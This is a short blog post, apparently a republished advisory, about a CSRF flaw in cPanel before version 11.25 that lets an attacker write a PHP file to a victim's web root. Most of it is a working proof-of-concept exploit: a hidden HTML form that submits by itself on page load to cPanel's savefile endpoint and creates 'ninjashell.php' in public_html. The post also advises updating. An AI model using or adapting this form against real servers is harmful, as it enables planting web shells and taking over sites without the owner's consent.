cPanel 11.25 CSRF vulnerability to upload any php Script !
cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer securitycheck, no matter what version you are using, you are vulnerable as well.
script:
<form name="editform" action=" |
http://localhost:2082/frontend/x3/err/savefile.html" method=POST |
onSubmit="return loadfdata();"> |
<input type="hidden" id="codepage" class="codepress html" name="page" |
value="<?php echo 'ninjashell'; ?>"> |
<input type="hidden" name="domain" value="localhost"> |
<input type="hidden" value="public_html/" name="dir"> |
<input type="hidden" value="ninjashell.php" name="file"> |
<body onload="document.forms.editform.submit();"> |
Afterwards simply check for
ninjashell.php in the directory.
All cPanel versions starting from 11.25 and above have two in-built
security features to prevent such attacks - security tokens and referrer security check. This means that if you are a cpanel client, you should update your
software.
Blog RSS Feed
Via E-mail
Twitter
Facebook
0 komentar:
Posting Komentar